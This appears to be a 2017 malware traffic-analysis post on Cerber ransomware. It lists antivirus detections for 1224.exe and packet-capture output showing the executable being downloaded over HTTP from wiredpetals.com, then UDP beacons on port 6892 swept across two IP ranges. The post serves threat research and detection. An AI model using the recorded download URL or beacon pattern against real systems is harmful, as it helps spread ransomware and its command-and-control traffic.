Text Example

wiredpetals.com 1224.exe Cerber Ransomware Malware Trojan PCAP File download traffic analysis

Posted on by admin

Download Attachments

  • 1 pcap 1224
    Date added: January 16, 2017 7:06 am Added by: admin File size: 53 KB Downloads: 103
SHA256: 3bdf2bac5602f1ba204ca4d40ca223a8f26c016b95c7f6bc840f60ec25a864f1
File name: 1224.exe
Detection ratio: 45 / 57
Analysis date: 2017-01-16 07:02:05 UTC ( 0 minutes ago )
AhnLab-V3 Trojan/Win32.Cerber.R193005 20170116
Arcabit Trojan.Generic.D3EED17 20170116
Avast Win32:Malware-gen 20170116
Avira (no cloud) TR/Injector.cktso 20170115
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9997 20170113
BitDefender Trojan.GenericKD.4123927 20170116
CAT-QuickHeal Trojan.Inject 20170116
ClamAV Win.Trojan.Agent-5485292-0 20170116
Comodo UnclassifiedMalware 20170116
CrowdStrike Falcon (ML) malicious_confidence_83% (W) 20161024
Cyren W32/Trojan.TCRK-3050 20170116
DrWeb Trojan.Encoder.7453 20170116
ESET-NOD32 a variant of Win32/Injector.DJKD 20170116
Emsisoft Trojan.GenericKD.4123927 (B) 20170116
F-Secure Trojan.Generic.20219229 20170116
Fortinet W32/Injector.DJKD!tr 20170116
GData Trojan.GenericKD.4123927 20170116

 

2017-01-16 00:20:05.399538 IP 192.168.1.102.63361 > 216.250.121.64.80: Flags [P.], seq 0:290, ack 1, win 256, length 290: HTTP: GET /new/1224.exe HTTP/1.1
E..Jqr@…s….f..y@…P.W0!k$7`P…a…GET /new/1224.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: wiredpetals.com
Connection: Keep-Alive

2017-01-16 00:21:02.186427 IP 192.168.1.102.61992 > 15.44.20.0.6892: UDP, length 25
E..5u……….f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186490 IP 192.168.1.102.61992 > 15.44.20.1.6892: UDP, length 25
E..5:Q…..,…f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186499 IP 192.168.1.102.61992 > 15.44.20.2.6892: UDP, length 25
E..5Rw………f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186593 IP 192.168.1.102.61992 > 15.44.20.3.6892: UDP, length 25
E..5……8l…f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186603 IP 192.168.1.102.61992 > 15.44.20.4.6892: UDP, length 25
E..5&…../….f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186717 IP 192.168.1.102.61992 > 15.44.20.5.6892: UDP, length 25
E..5j……u…f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186725 IP 192.168.1.102.61992 > 15.44.20.6.6892: UDP, length 25
E..5……T….f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186775 IP 192.168.1.102.61992 > 15.44.20.7.6892: UDP, length 25
E..5N)…..N…f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186849 IP 192.168.1.102.61992 > 15.44.20.8.6892: UDP, length 25
E..5……9….f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186858 IP 192.168.1.102.61992 > 15.44.20.9.6892: UDP, length 25
E..5S……….f.,.     .(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186907 IP 192.168.1.102.61992 > 15.44.20.10.6892: UDP, length 25
E..5;……….f.,.
.(…!..9973e23bd78600889501000d0

2017-01-16 00:21:03.206140 IP 192.168.1.102.61992 > 91.239.25.241.6892: UDP, length 25
E..567………f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206190 IP 192.168.1.102.61992 > 91.239.25.242.6892: UDP, length 25
E..5N……….f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206248 IP 192.168.1.102.61992 > 91.239.25.243.6892: UDP, length 25
E..5…….:…f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206303 IP 192.168.1.102.61992 > 91.239.25.244.6892: UDP, length 25
E..5:……….f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206353 IP 192.168.1.102.61992 > 91.239.25.245.6892: UDP, length 25
E..5    ……(…f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206356 IP 192.168.1.102.61992 > 91.239.25.246.6892: UDP, length 25
E..5!……….f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206406 IP 192.168.1.102.61992 > 91.239.25.247.6892: UDP, length 25
E..5bk…..X…f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206477 IP 192.168.1.102.61992 > 91.239.25.248.6892: UDP, length 25
E..5………..f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206527 IP 192.168.1.102.61992 > 91.239.25.249.6892: UDP, length 25
E..5O……….f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206531 IP 192.168.1.102.61992 > 91.239.25.250.6892: UDP, length 25
E..57……….f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206603 IP 192.168.1.102.61992 > 91.239.25.251.6892: UDP, length 25
E..5lh…..W…f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206654 IP 192.168.1.102.61992 > 91.239.25.252.6892: UDP, length 25
E..5c……….f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206657 IP 192.168.1.102.61992 > 91.239.25.253.6892: UDP, length 25
E..5 \…..a…f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206721 IP 192.168.1.102.61992 > 91.239.25.254.6892: UDP, length 25
E..5.8………f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:04.198130 IP 192.168.1.102.61992 > 91.239.25.255.6892: UDP, length 25
E..5;……9…f[….(…!..9973e23bd78600889501000d0

Leave a Reply